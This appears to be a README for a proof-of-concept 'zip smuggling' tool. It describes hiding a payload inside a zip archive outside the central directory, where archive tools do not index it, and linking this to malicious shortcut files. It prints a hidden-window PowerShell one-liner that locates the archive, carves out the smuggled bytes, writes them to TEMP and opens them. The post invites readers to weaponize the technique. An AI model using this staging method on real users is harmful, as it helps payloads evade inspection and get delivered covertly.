Zip Smuggling: The Stealthy Way to Hide Data in Plain Sight

This project leverages an older one of mine, lnk_generator, that allows you to create arbitrary shortcut files using a preset template. Check out that repo for more of the details / more complete scripts and notes on generating shortcut files.

The data that is smuggled is placed in-between the data of the files contained within the archive and the archives central directory, which serves as a table of contents of sorts for the zip file. This central directory contains offsets of the files within the archive, so while our injected data is present within the zip it isn’t tracked or indexed by the central directory and thus cannot be easily viewed or extracted. The python script finds “End of Central Directory” offset within the zip file and updates it with the new location of the central directory after the smuggled data has been injected. The following graphic displays the general structure of a zip on the left, and where our data has been inserted on the right:

The smuggled data is extracted using a powershell command:

powershell.exe -w 1 -c "$name = \"testing\";$file = (get-childitem -Pa $Env:USERPROFILE -Re -Inc *$name.zip).fullname;$bytes=[System.IO.File]::ReadAllBytes($file);$size = (0..($bytes.Length - 4) | Where-Object {$bytes[$_] -eq 0x55 -and $bytes[$_+1] -eq 0x55 -and $bytes[$_+2] -eq 0x55 -and $bytes[$_+3] -eq 0x55 })[0] + 4;$length=12;$chunk=$bytes[$size..($size+$length-1)];$out = \"$Env:TEMP\$name.txt\";[System.IO.File]::WriteAllBytes($out,$chunk);Invoke-Item $out"

This command:

1. Searches recursively through the user’s home folder for the zip file
2. Reads it into memory
3. Locates an egghunter byte sequence (0x55/0x55/0x55/0x55) marking the start of the smuggled data
4. Writes the smuggled data to disk as payload_name.txt
5. Opens the text file using the default system application for .txts

This POC has been left pretty general / weaponizing it to use other file types / etc will be left as an exercise to the reader.

Download & Use